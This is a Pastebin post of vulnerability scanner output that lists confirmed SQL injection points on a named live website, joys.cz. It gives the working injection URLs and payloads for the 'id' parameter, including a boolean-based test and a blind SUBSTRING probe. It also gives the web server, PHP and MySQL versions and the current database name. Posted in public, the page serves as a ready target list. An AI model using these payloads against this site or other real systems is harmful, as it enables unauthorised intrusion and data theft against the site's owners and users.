Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Boolean Based SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.joys.cz/obsah.php?lang=cz&id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- ||| [High Possibility] SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Vulnerable URL : http://www.joys.cz/obsah.php?lang=cz&id=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| Database Error Message
- Severity : Low
- Confirmation : Confirmed
- Vulnerable URL : http://www.joys.cz/obsah.php?lang=cz&id=%27
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| MySQL Database Identified
- Severity : Information
- Confirmation : Confirmed
- Vulnerable URL : http://www.joys.cz/obsah.php?lang=cz&id=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--
- Vulnerability Classifications: -
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--
- ||| Injection ?
- links> http://www.joys.cz/obsah.php?lang=cz&id=-1 OR 1=1 AND 1
- links> http://www.joys.cz/obsah.php?lang=cz&id=-1 OR 17-7=10
- Web Server: Apache
- Powered-by: PHP/5.2.5
- DB Server: MySQL
- Current DB: db_joys_cz
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement